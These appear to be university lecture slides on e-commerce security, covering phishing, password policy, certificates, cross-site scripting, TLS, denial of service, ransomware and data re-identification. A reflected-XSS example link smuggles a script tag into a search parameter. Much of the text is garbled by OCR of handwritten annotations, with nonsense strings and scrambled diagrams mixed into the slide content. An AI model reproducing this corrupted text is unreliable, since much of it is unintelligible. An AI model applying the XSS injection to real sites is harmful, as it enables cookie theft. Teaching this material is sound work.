COMP 3320

ELECTRONIC COMMERCE TECHNOLOGY

LECTURE 4: E-COMMERCE SECURITY

Dr John T. H.Yuen
(Main Reference Chapter 10) CYC 306, thyuen@cs.hku.hk 1
OVERVIEW

Understand
E-Com Security Basics
Client-side Security
Communication Security
Server-side Security
Data Privacy

2
WHY DO WE NEED E-COM SECURITY?

need to pay to maintain but not

generating profit .

*
-
Even if you invest a lot in security, the customer cannot see it
hence many companies put minimal effort to it
But if you do NOT have enough security and you site is hacked, your customer is
very unhappy!

4
FUNDAMENTAL SECURITY OBJECTIVES

Confidentiality : information is not disclosed or revealed

to unauthorized persons Secret info should remain invisible (encryption )
Integrity : prevent unauthorized creation, alternation, or
destruction of data avoid changes ( hash function / digital signature)
Availability : ensure legitimate users are not unduly
denied access to information and resources
access to the info c
allow legitimate users )

5
WHAT IS E-COM SECURITY?

Two different perspectives:

Security features of a system (e.g., ensuring Protection against attacks rather than
passwords that are at least 8 characters specific features of the system.
long, authentication of user, encryption of Privacy leakage Protect against attack
sensitive data)
eg password policy Financial fraud
security features of the system Identity stealing
6
ATTACK SCENARIO

Attack software

Trick shopper

Hack mobile
phone Attack server
Snoop network make sure of
listentotlletraffirblw
rings / loopholes
theshopoeuses
andqetthepadeetsfrom channel
wireless network

legifakewifironterih Starbucks )
7

Client-side Security Communication Security Server-side Security

Client-side Security
in E-commerce

8
EXAMPLE Puli
shiny
( Pretend to be someone )

9
SOCIAL ENGINEERING on the user himself ,
met on the
system

10
 Hackers differentiate stupid targets who is more
the vulnerable
PHISHING
: .

really very stupid )

l the emails are

Fraudulent attempt to obtain sensitive information such as usernames, passwords

and credit card details by disguising as a trustworthy entity
Long history of attacks since 1987. In 2017, 76% of organizations experienced
phishing attacks. to get sensitive info
In 2014, iCloud leaks of celebrity photos e.
g. user id 1 password
a collection of almost 500 private pictures of various celebrities, such as Jennifer
Lawrence, Kate Upton, were posted
phishing email pretending to be from apple / angle
photos obtained via a breach of Apple's iCloud ( to reset
passwords
it was found that the hacker phished by sending e-mails to the victims that looked like
they came from Apple or Google, warning the victims that their accounts might be
compromised and asking for their account details. 11
 CLIENT SIDE SECURITY

Common passwords
on which

the that
system
have no

password policies

13
CLIENT AUTHENTICATION

Education
E.g., a shopper should be advised to choose a stronger password and keep his
password confidential.

Server password policies:

Maximum occurrence of consecutive characters: 3 characters
Maximum instances of any character: 4 instances
Maximum lifetime of passwords: 180 days
Minimum number of alphabetic characters: 1
Minimum number of numeric characters: 1
Minimum length of password: 6 characters 14
 Entropy ( how random your password is )
Password Potion Companies with strict
is not quite woeful password potion
: Staff writes out
Brutal Force Attack
passwords on memo

lloopthno '
numbers )
& flick on the monitor
.

Possible when hackers haired access

to the password lid database

Dictionary Attack
15

(try words normally exist )

CLIENT AUTHENTICATION

Responsible i Clients ( lesson

Developers )
Simple website: build your own using PHP + MySQL database
Managing intranet of a big company: use software like MS Active Directory
Current trend: use OpenID
OpenID: allows users to be authenticated by co-operating sites using a third-
party service, eliminating the need for webmasters to provide their own ad
hoc login systems

16
TWO-FACTOR AUTHENTICATION (2FA)

2FA: a method of confirming users' claimed identities by using a combination

of two different factors: 1) something they know, 2) something they have, or 3)
something they are.
Common examples in e-commerce:
Credit Card Security Code + SMS confirmation during e-payment
E-banking password + security token
E-banking password + mobile token (fingerprint/FaceID)
Required by regulatory bodies for financial applications

17
CLIENT-SIDE SECURITY

Not much control from E-com developers

One client can interact with many E-com servers
Potential problem: information from E-com sites can be stolen from cookies in a
client machine)
More serious problem: Active Content
Programs embedded in Web pages Whenever it is sent ,

E.g. Java applets, ActiveX controls, Javascripts, VBSscripts AN

itrunsmyawbmrsers .

Attracts trojan horse, virus, malicious cookie, zombie (a program secretly takes over the
computer)
Cross-Site Script Attack (XSS attack) 18
 Hackers may capture the

DEFENCE: DIGITAL SIGNATURE AND CERTIFICATE packeesoltransformot

tntotrojomhorseolsentbaek
"

Digital Signature
"

Example of protecting Active Content to be executed in

client side
Technical term: check the Digital Signatures of the Java Applets
digital signature: a mathematical scheme to verify the 1st Generate both
:

authenticity of digital messages Checuthestniug

public / private
key sltkeursg

(
Trusted Third P are
.

the Certification Authorities

2nd :8iqn
Use in a user transparent manner: the browser handles this with

automatically the

private key
[Math .pro-10611 3rd :Bobverifythemsg 19

Usihqtthicéspnbhzkey
SIGNED JAVA APPLETS

signed m
the server
Client gets a program (Java Applet) ←
Java Applet
from Server public key

The Java Applet contains a digital

Verify the
" '

signature, signed by Server '

Web server
Client (Browser) using servers
Client verifies the signature of the public key
Q: how to ensure the public key is legitimate?

20
 ATTACK & DEFENCE

How to ensure the public key is legitimate? Answer: Use public key certificate
Public Key Certificate: issued by a
File

Java Applet
public key Certification Authority (CA): a Trusted
Third Party (TTP)
Root Certificate: A
Hacker B rowers would
Client (Browser)
browser
contain General

Certificate authorities 21

-
ROOT CERT & PUBLIC KEY CERTIFICATE
Server : the merchant that needs the certificate
CA_1 : certificate authority

correctness of digital signature in the Java Applet

Root Cert(s): usually bundled with browser
Java Applet and certificate(from server) Chainoftmst
Trust

gtmst+
-
Server certificate
- -1m€
Root Cert of Java Applet
CA_1 + (signature
+ issued by CA_1
by Server)

t Public Key Certificate

installing our issued by Yes: program is safe / 22

browser
wetmsttnis
Hongkong Post No: program is risky
CERTIFICATE CHAIN
possible tohavesenerals
certificate issued by another party (intermediate CA)
Intermediate CA has a certificate issued by CA_1

Cert of Intermediate
Root Cert of
CA phone
CA_1
+ issued by workload
CA_1
oftherootcrt
lcanberevoked )
+
Server cert
Mayhew busy Java Applet
+ (signature
issued by
Charles
+ by Server)

23
Yes: program is safe /
Public Key Certificate
No: program is risky
ROOT CERTIFICATES IN BROWSER (A LOT!)

24
XSS CROSS-SITE SCRIPTING

Original Web Client-Server concept

Client sends http request to Server
Server sends http response, which is a web page, to be displayed on Client (browser)
With client-side scripting function (a not very secure extension)
Client sends http request to Server
Server sends http response, which is a web page containing a script
<script> </script>
Displaying a script means executing it (e.g., a JavaScript) on Client (browser)
Hacker web site sends client a script (that steals information) from an honest web site.
Accounted for 84% of all security vulnerabilities documented by Symantec as of 2007.
It is reported that XSS is still a major threat vector in 2017. 25

You can try at: https://xss-game.appspot.com/level1

 26
Source: https://excess-xss.com/
A REFLECTED ATTACK TO STEAL COOKIE

One popular form: Reflected XSS

Client visits a bad site, received a malicious link

This malicious link points to a good site, (e.g. perform some search at the good site)
\

http://good.com/search.php?term </script>
Client user clicks the link
When the good site returns the search result to the client, the bad script at the client side will be
executed
The bad script is from good site, so it is allowed to send cookies and info from good site to bad site 27
REFLECTED XSS ATTACK

Reflected XSS: The

attack script is
\

the user in a page

from the victim site

28

Source: https://excess-xss.com/
PREVENTING XSS

Encoding
escapes the user input so that the browser interprets it only as data, not as code.
Validation
filters the user input so that the browser interprets it as code without malicious commands

29
Communication Security
in E-commerce

30
POTENTIAL ATTACKS ON COMMUNICATION

Sniffing the network

E.g., An attacker monitors the data between

collects data about the shopper or steals

personal information, such as credit card
numbers.
http://www.good.com

Man-in-the-middle attack
E.g., An attacker pretends to be the server
towards the user, and pretends to be the user
towards the server.
31

http://www.g00d.com
NETWORK SECURITY

Technically, we cannot prevent people reading our data.

Aka Transport Layer Security
We rely on ISP to help us forward our data. (TLS) in current version
But we can only prevent people from understanding the
data even if they read it: encrypt the data

32
 ENCRYPTION
Symmetric key encryption:
- the encryption and decryption key are
the same

33

Source: https://pixelprivacy.com/resources/what-is-encryption/
 SYMMETRIC KEY ENCRYPTION

Julius Caesar

Alan Turing
34

https://crypto.interactive-maths.com/caesar-shift-cipher.html
CAESAR CIPHER

puayvkbjapvu av lsljayvupj jvttlyjl

2. Is there any clever way to decrypt Caesar cipher?

35
HOP BY HOP ENCRYPTION

Internet

Client 3:
Mobile phone Key: Sim card

Web Server

Key: Wifi password Client 2:

Client 1: PC iPad

36

Difficulty: key distribution problem

 PUBLIC KEY ENCRYPTION
Public key encryption:
- the encryption and decryption key are
different

37

Source: https://pixelprivacy.com/resources/what-is-encryption/
END-TO-END ENCRYPTION

Internet

Client 3:
Mobile phone

Web Server

Client 2:
Client 1: PC iPad

38

TLS/SSL: using digital certificate

SSL IN E-COMMERCE

HTTPS: standard HTTP protocol with a layer of SSL/TLS encryption

against identity theft and man-in-the-middle attacks.

The SSL layer has 2 main purposes:
Verifying that you are talking directly to the server that you think you are talking to
Ensuring that only the server can read what you send it and only you can read what it sends back
Many customers will refuse to do business with a website that doesn't have SSL.
Displaying your SSL Site Seal tells customers they can shop with confidence, knowing they're protected.
Different certificates provide different levels of validation.

39
SSL OVERVIEW

Rough Idea:
The root cert of CA_1 has one extra function:
From a public key certificate,
can only be opened by the owner of the certificate. This is
known as key exchange + encryption.

Root Cert of Bob cert

(only open
CA_1
+ issued by CA_1
by Bob)

40
Public Key Certificate
KEY EXCHANGE

Rough idea of key exchange:

Generate a common secret key (which is used for
encryption later)
No one can know the secret by observing what is sent
in public

41
SIMPLIFIED SSL STEPS

Bob gives Alice a cert (issued by CA_1)

Using the root cert of CA_1 and Alice creates a

Alice creates a session key (SK) for this locked box

Bob cert issued From now on, Alice will use SK to send secret data to the
by CA_1 server who claimed to be Bob
If the server is really Bob:
Bob can find value of SK, open the locked box, and can
to send data to Alice
If the server is NOT Bob:
The server will not find the correct SK value.
Communication will halt.
42
session key (SK)
HTTPS SERVER AUTHENTICATION WITH SSL

43

Demo: https://badssl.com/
Server-side security in E-commerce

44
SOFTWARE SECURITY IN SERVER SIDE

A program may contain A command is placed as Undocumented

- part of a SQL statement, features
sent from client to be OS bugs that are not
input, the attacker can (illegally) executed in fixed
run a piece of attack server 45

code on the server

FIREWALL

Firewall: a network security system that monitors and controls

incoming and outgoing network traffic based on predetermined
security rules.
Types:
Packet filtering (late 1980s): check packets by source and destination
network addresses, protocol, source and destination port numbers
Stateful filtering (1990s): retaining packets until enough information is
available to make a judgment about its state

FTP/HTTP) to make judgment

Future: machine learning/AI??
46
POTENTIAL ATTACKS ON SERVER SIDE

In a denial-of-service (DoS) attack, the attacker make a

machine or network resource unavailable to its intended
users by temporarily or indefinitely disrupting services of a
host connected to the Internet.
typically by flooding the targeted machine or resource with
superfluous requests to overload systems.
In a distributed denial-of-service (DDoS) attack, the
incoming traffic flooding the victim originates from many
different sources.
impossible to stop the attack simply by blocking a single source.
on March 1, 2018, GitHub was hit by an attack of 1.35 terabits
per second 47
48
POTENTIAL ATTACKS ON SERVER SIDE
Ransomware (Since 2012)
a type of malicious software that threatens to publish the victim's data or perpetually block access to
it unless a ransom is paid.
CryptoLocker (2013)
generated a 2048-bit RSA key pair and uploaded to a server, and used to encrypt files using a whitelist of
specific file extensions.
threatened to delete the private key if a payment of Bitcoin or a pre-paid cash voucher was not made within
3 days of the infection.
WannaCry (2017)
EternalBlue
infected more than 230,000 computers (e.g., FedEx. Honda, UK NHS hospital system) in over 150 countries,
using 20 different languages to demand money from users using Bitcoin 49

demanded US$300 per computer within 7 days

WANNACRY RANSOMWARE ATTACK

In May 2017,WannaCry ransomware targeted computers running the Microsoft Windows operating
system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency.
Multiple causes:
Windows has a loophole
It is believed that the NSA discovered it and used it to hack others (instead of informing MS)
The hacking tool EternalBlue is circulated by hackers
Microsoft eventually discovered the vulnerability and patched it in March 2017
In May 2017, WannaCry used EternalBlue to find vulnerable computers, then encrypted the files in it and asked
for ransom
Ransom is paid by Bitcoin, which is very difficult to trace
50
51
DATA PRIVACY

Data privacy concerns exist wherever personally identifiable information (PII) or other sensitive
information is collected, stored, used, and finally destroyed or deleted.
If you do not use encrypted email, HTTPS, etc., your PII is very likely to be leaked to the hacker
Even if you use encryption during communication (communication security), does the e-com website
take good care of your data?
Did they store it securely? (server security)
Did they share it with other companies? Did they anonymize the data before sharing?

52
DATA ANONYMIZATION:
THE CASE OF NETFLIX

In 2006, Netflix published a large database as part of its $1 million Netflix Prize, a challenge to the
world's researchers to improve the rental firm's movie-recommendation engine.
The public dataset did not include names, instead using an anonymous identifier for each user, the
collection of movie ratings

User ID Avengers X-men Roma Star War Toy Story Ironman It

123
236
753
546
423
53
674
DATA ANONYMIZATION:
THE CASE OF NETFLIX

IMDb: a public database of user ratings on movies

A combination of Netflix
anonymoized User ID Avengers X-men Roma Star War Toy Story Ironman It

IMDb public database is enough to Alice

identify the people
Bob
May cause embarrassment to Bob Carol
if his Netflix record (named 236)
showed that he watched some David
XXX movies Eve
Resulted in lawsuit at the end

54

Reference: How To Break Anonymity of the Netflix Prize Dataset. Arvind Narayanan, Vitaly Shmatikov. 2006
GENERAL DATA PROTECTION REGULATION (GDPR) IN 2018

A regulation in European Union (EU) law on data protection and privacy for all individuals within the EU
Business processes that handle personal data
must be designed and built with consideration of the principles and provide safeguards to protect data (e.g.,
using pseudonymization or full anonymization where appropriate)
use the highest-possible privacy settings by default
Businesses must report any data breaches within 72 hours

55
DATA SHARING WITH CARE

Data sharing between companies are common

56
THE INFLUENCE OF DATA ANALYTIC

In 2014, approximately 270,000 people used a Facebook app to take

a personality test for academic research purposes.

shut down in 2015).

It obtained data from up to 87 million users handed to political
consulting firm Cambridge Analytica build profiles of individual
voters and their political preferences to best target advertising and
sway voter sentiment.
According to Cambridge Analytica whistleblower, this data help

presidential election. 57
IDENTIFYING YOU IN CENSUS DATA

In 1997, a health insurance organization

hospital visit
ZIP code, date of birth, and gender are retained for research purpose
Researcher Sweeney bought the public voter records from Massachusetts, which had both full identifiers
(names, addresses) and demographic data (ZIP code and date of birth)
Identify the medical record of the Governor!

87% of the population in U.S. can be uniquely identified based on ZIP code, date of birth, and gender, according
to the Census summary data in 1991.
These attributes that can be potentially linked with external information to re-identify entities
58

Source: P. Samarati, L. Sweeney. "Protecting privacy when disclosing information: k-anonymity and its enforcement through generalization and
EXAMPLE

Hospital Patient Data Vote Registration Data

DOB Sex Zipcode Disease Name DOB Sex Zipcode

1/21/76 Male 53715 Heart Disease Andre 1/21/76 Male 53715
4/13/86 Female 53715 Hepatitis
Beth 1/10/81 Female 55410
2/28/76 Male 53703 Brochitis
Carol 10/1/44 Female 90210
1/21/76 Male 53703 Broken Arm
Dan 2/21/84 Male 02174
4/13/86 Female 53706 Flu
2/28/76 Female 53706 Hang Nail Ellen 4/19/72 Female 02237

Andre has heart disease!

59
DIFFERENTIAL PRIVACY

Differential Privacy:
a person's privacy cannot be compromised by a statistical release if
their data are not in the database Usage:
2015: Google, for sharing
the goal is to give everyone roughly the same privacy that would historical traffic statistics.
result from having their data removed 2016:Apple announced its
intention to use differential
add noise to the query answer privacy in iOS 10 to improve
the noise should ensure that the probability we receive an answer when a its intelligent personal
user is in the data, and the probability we receive the same answer when assistant technology
the user is not in the data, is almost the same
the privacy level is a parameter that defines how close these two
probabilities should be
60
E-COMMERCE SECURITY: SUMMARY
Privacy

Attack software

Trick shopper Hack mobile Attack server

phone Snoop network

61

Client-side Security Communication Security Server-side Security